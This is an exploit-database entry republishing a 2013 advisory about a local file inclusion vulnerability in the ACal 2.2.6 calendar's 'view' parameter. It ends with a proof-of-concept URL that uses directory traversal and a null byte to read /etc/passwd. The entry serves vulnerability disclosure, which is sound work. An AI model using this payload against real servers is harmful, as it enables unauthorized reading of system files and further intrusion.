ACal 2.2.6 'view' Parameter Local File Include Vulnerability

2013-08-15T00:00:00
ID EDB-ID:38697
Type exploitdb
Reporter ICheer_No0M
Modified 2013-08-15T00:00:00

Description

ACal 2.2.6 'view' Parameter Local File Include Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/61801/info

ACal is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input before being used to include files.

An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks.

ACal 2.2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/calendar/embed/example/example.php?view=../../etc/passwd%00